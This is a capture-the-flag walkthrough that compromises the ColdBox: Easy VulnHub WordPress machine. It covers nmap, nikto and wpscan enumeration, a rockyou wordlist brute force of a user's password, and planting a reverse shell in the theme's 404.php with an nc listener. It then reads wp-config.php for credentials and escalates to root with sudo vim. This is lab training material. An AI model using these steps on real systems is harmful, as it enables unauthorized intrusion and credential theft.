COLDDBOX: EASY WALKTHROUGH
Hi everyone this vm is designed by C0ldd and hosted on Vulhnub. It is a Wordpress machine with an easy to difficulty level.
Work on virtualbox.
This works better with VirutalBox rather than VMware
You can download the vm from this link
https://mega.nz/file/VldHiIgA#4nRI2LPZs_x48_-ryCkPvL6Em2lQTSJEKvoReieDMec
So lets start off, first as usual we run a netdiscover -i vboxnet0
Network Scanning
So lets start off, first as usual we run a full port scan , this was what I got.
nmap -v -sV -p- -O 192.168.56.105
Here -v vervose mode , -sV version info , -p- all port scanning and -O os detection .
Enumeration
As usual , we thought that port 80 would be our way in, so we tried to enumerate it as much as possible. We visit the page…
So we Use nikto to find weak config HTTP files, and found an entry for “wordpress”
nikto -h http://192.168.56.105
Here we can see some directories so i visit one and one all directories.
I go http://192.168.56.105/hidden and we can find three user.
Let’s run the wpscan for enumerating all user run the command.
wpscan url http://192.168.56.105 -e u
Then i go another directories http://192.168.56.105/wp-login.php and we found login page.
Again we use wpscan for finding the c0ldd user password and the command is wpscan — url http://192.168.56.105 -U c0ldd -P /usr/share/wordlists/rockyou.txt
After a minute we successfully crack the c0ldd user password let’s login with the WordPress panel and uploading our reverse shell.
Now we log in with c0ldd user. And we enter the wordpress dashboard.
It’s time to take reverse shell from wordpress..
Go on Appearance > Editor
Then Click on “select theme to edit” and use Theme “Twenty Fifteen” then Click on select.
Now Select “404 Template (404.php).
and replace the 404.php file contain with our given payload.
URL :- “http://192.168.56.105/wp-content/themes/twentyfifteen/404.php”
Start the reverse shell listener on attacker machine with nc . for getting reverse shell.
Not tty are found here.
so this command will solve our problem -
Command:- python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
Firsty we check cat /etc/passwd file to find how many user. We get only one User C0ldd/ So, we firstly go cd /home/Co0ldd . We found one txt file but not permission to open this. So i firstly search c0ldd passsword. Here Command i used cat /var/www/html/wp-config.php & we find coldd password
I try this to login c0ldd user and password is cybersecurity.
Command :- su c0ldd
We done login with Coldd and che
c0ldd@ColddBox-Easy:/var/www/html$ id
id
uid=1000(c0ldd) gid=1000(c0ldd) grupos=1000(c0ldd),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
Privilege Escalation
We run the Sudo -l command for checking sudo permission our current user and our user c0ldd can run three binary commands with the sudo permission. Let’s run the privilege escalation command.
So i go gtfbions and search vim to root the machine.
Finally We done it.